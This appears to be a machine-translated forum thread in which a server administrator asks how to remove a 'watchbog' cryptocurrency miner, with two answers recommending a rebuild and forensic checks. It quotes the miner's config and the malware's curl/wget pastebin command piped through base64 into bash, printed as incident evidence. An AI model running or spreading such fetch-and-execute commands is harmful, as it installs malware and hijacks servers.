一个名为./watchbog的进程正在我们的服务器中挖掘密码货币。我该怎么阻止它？

Question

我在下面发现了这个问题，但我需要更多的澄清，这也是我再次写作的原因。

我有一个叫做“监视沼泽”的进程，它完全占用了我的CPU，我不知道它是什么。

所以我做了一些调查，发现一个可执行文件正在从/tmp目录中运行。文件夹结构如下所示：

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

该文件夹中有两个文件，一个正在运行的可执行watchbog和一个config.json。这是配置文件的内容，

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

但是删除文件夹是没有帮助的，它们正在被重新创建几秒钟。因此，我试图查看正在运行的其他进程，并发现了以下内容

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

pastebin url指向另一个shell命令，另一个shell命令指向另一个pastebin url。

(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash

第二个pastebin url指向一个base64编码的shell脚本。我不能把它包括在这里，因为字符限制。下面是链接：https://pastebin.com/raw/nMrfmnRa

我不是这个领域的专家，但看起来脚本正在设置一个cron作业，它再次下载可执行文件。

这是我自己能找到的所有东西，能不能请任何人指导我如何才能阻止这一切，或者我是否需要重新部署服务器？

Answer 1

在我看来，无法判断服务器的其他部分是否安全。如果我是你，我会亲自挑选文件来保存和重新创建一个新的服务器，以确保它不会被破坏。否则，你可能会像BlankMediaGames一样，文件在几年后被泄露。安全总比抱歉好

Answer 2

也许，您可以确定服务器的其他部分是否被破坏，但这取决于法医调查。您可以从以下链接的几个命令和方向开始：https://staff.washington.edu/dittrich/misc/forensics/。这是有点基本，但将帮助您提供一个更好的业务重组，而不是简单的猜测。同时，我建议您创建一个新的服务器，以避免业务中断。

此外，我建议您阻止网络边界中的恶意URL (通过:443进行通信的URL)，并检查crontab例程。

啊啊..。如果你发现了从Pastebin获取信息的东西，如果你有一个Pro帐户，你可以要求Pastebin记下那个特定的地址。